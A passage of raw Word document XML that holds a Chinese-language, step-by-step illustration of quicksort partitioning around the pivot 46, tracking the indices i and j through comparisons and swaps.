        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>不需要交换，移动</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> i = 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007216CF" w:rsidRPr="00195466" w:rsidRDefault="007216CF" w:rsidP="00195466">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="107" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　　　　　　　　　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>i = 2                   j = 7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007216CF" w:rsidRPr="00195466" w:rsidRDefault="007216CF" w:rsidP="00195466">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="107" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　　　　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>  15  30  </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>46</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>  90  56  17  </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>95</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>82</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>      82 &gt; 46</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>交换</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">82 </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 46</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，移动</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> j </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> j = 6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007216CF" w:rsidRPr="00195466" w:rsidRDefault="007216CF" w:rsidP="00195466">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="107" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　　　　　　　　　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>i = 2               j = 6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007216CF" w:rsidRPr="00195466" w:rsidRDefault="007216CF" w:rsidP="00195466">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="107" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　　　　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>  15  30  </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>46</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>  90  56 </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> 95  </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>82</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>      95 &gt; 46</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>不需要交换，移动</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> j </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> j = 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007216CF" w:rsidRPr="00195466" w:rsidRDefault="007216CF" w:rsidP="00195466">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="107" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　　　　　　　　　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>i = 2         j = 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007216CF" w:rsidRPr="00195466" w:rsidRDefault="007216CF" w:rsidP="00195466">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="107" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　　　　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>  15  30  17 </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>90</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>  56  </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>46</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>  95  </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>82</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>      17 &lt; 46</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>交换</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">46 </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 17</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，移动</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> i</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> i = 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007216CF" w:rsidRPr="00195466" w:rsidRDefault="007216CF" w:rsidP="00195466">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="107" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　　　　　　　　　　　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>i = 3    j = 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007216CF" w:rsidRPr="00195466" w:rsidRDefault="007216CF" w:rsidP="00195466">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="107" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　　　　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  15  30  17  </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>46</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
